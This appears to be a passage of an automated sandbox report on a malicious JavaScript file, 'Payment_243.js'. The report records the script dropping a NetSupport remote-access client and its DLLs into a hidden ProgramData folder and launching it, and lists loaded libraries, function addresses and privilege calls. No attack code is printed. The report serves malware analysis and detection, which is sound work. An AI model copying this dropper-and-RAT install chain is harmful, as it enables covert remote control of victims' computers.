                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110336D04_2_110336D0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110518004_2_11051800
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1115F8404_2_1115F840
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1102BD404_2_1102BD40
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1101BCD04_2_1101BCD0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11087F504_2_11087F50
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11045E704_2_11045E70
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1101C1104_2_1101C110
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_111640E04_2_111640E0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_111683454_2_11168345
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_111265B04_2_111265B0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110704304_2_11070430
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110807404_2_11080740
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1100892B4_2_1100892B
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1101CF304_2_1101CF30
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A12EB1A6_2_6A12EB1A
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1709156_2_6A170915
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1109196_2_6A110919
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A156E186_2_6A156E18
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F6E286_2_6A0F6E28
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F6E246_2_6A0F6E24
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1782206_2_6A178220
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13A2776_2_6A13A277
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F828B6_2_6A0F828B
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1522CD6_2_6A1522CD
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F839B6_2_6A0F839B
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1541596_2_6A154159
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0FA1DD6_2_6A0FA1DD
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0E21F06_2_6A0E21F0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A15E7F16_2_6A15E7F1
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1867FF6_2_6A1867FF
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F84686_2_6A0F8468
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1045AE6_2_6A1045AE
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13DA386_2_6A13DA38
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A181AE06_2_6A181AE0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F3B1D6_2_6A0F3B1D
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A187B2A6_2_6A187B2A
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1598776_2_6A159877
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A15F8BA6_2_6A15F8BA
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1739686_2_6A173968
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F5E206_2_6A0F5E20
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13DF356_2_6A13DF35
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F9C8E6_2_6A0F9C8E
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A171CEF6_2_6A171CEF
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F7D206_2_6A0F7D20
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F3DB16_2_6A0F3DB1
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F72106_2_6A0F7210
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1892956_2_6A189295
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A10911E6_2_6A10911E
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A15516D6_2_6A15516D
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1531BA6_2_6A1531BA
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A1896A76_2_6A1896A7
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F96C96_2_6A0F96C9
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A15B7236_2_6A15B723
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A17D7546_2_6A17D754
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F57956_2_6A0F5795
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A15D43B6_2_6A15D43B
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13D4FF6_2_6A13D4FF
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F75C16_2_6A0F75C1
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F35FA6_2_6A0F35FA
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_716629A06_2_716629A0
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\x225qa0\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: C:\ProgramData\x225qa0\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 6A0F0934 appears 76 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 11161299 appears 40 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 11027F40 appears 47 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 6A0FB69A appears 61 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 6A0FA455 appears 40 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 11164ED0 appears 33 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 11147060 appears 571 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 1105E820 appears 310 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 11081E70 appears 46 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 6A0F0950 appears 151 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 11029A70 appears 958 times
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: String function: 1116FED0 appears 37 times
                                Source: Payment_243.jsInitial sample: Strings found which are bigger than 50
                                Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: classification engineClassification label: mal100.rans.evad.winJS@5/26@1/3
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1105A760 GetLastError,FormatMessageA,LocalFree,4_2_1105A760
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,4_2_1109D860
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,4_2_1109D8F0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13D3BB _getdiskfree,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_memset,GetDiskFreeSpaceA,GetLastError,_errno,6_2_6A13D3BB
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,4_2_11116880
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11089430 FindResourceA,LoadResource,LockResource,4_2_11089430
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
                                Source: C:\ProgramData\x225qa0\client32.exeFile created: C:\Users\user\AppData\Local\NetSupportJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe"
                                Source: unknownProcess created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe"
                                Source: unknownProcess created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\ProgramData\x225qa0\client32.exe "C:\ProgramData\x225qa0\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wdscore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscdll.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: synceng.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wer.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: devrtl.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wow64win.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wow64cpu.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wbemcomn2.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: bcrypt.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: rpcrtremote.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: ntdsapi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: webio.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wow64win.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wow64cpu.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wow64win.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wow64cpu.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile written: C:\ProgramData\x225qa0\NSM.iniJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Payment_243.jsStatic file information: File size 5736023 > 1048576
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\PROGRA~3\x225qa0\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000006.00000002.530287670.000000006A0E1000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.547818882.000000006A0E1000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000004.00000002.671173714.0000000073622000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000006.00000002.530359890.0000000073622000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000008.00000002.547917343.0000000073622000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.671142081.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000006.00000002.530337343.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.547879856.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,HttpSendRequestA,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: webmvorbisencoder.dll.0.drStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1116FF15 push ecx; ret 4_2_1116FF28
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0F0995 push ecx; ret 6_2_6A0F09A8
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0E2D80 push eax; ret 6_2_6A0E2D9E
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A10A6AA push EF3FEFD4h; iretd 6_2_6A10A6B1
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A0FBF60 push ecx; ret 6_2_6A0FBF73
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A109CD8 pushad ; iretd 6_2_6A109CE6
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_716640A5 push ecx; ret 6_2_716640B8
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\client32.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\webmvorbisencoder.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\webmmux.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\client32.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\webmvorbisencoder.dllJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\ProgramData\x225qa0\webmmux.dllJump to dropped file
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
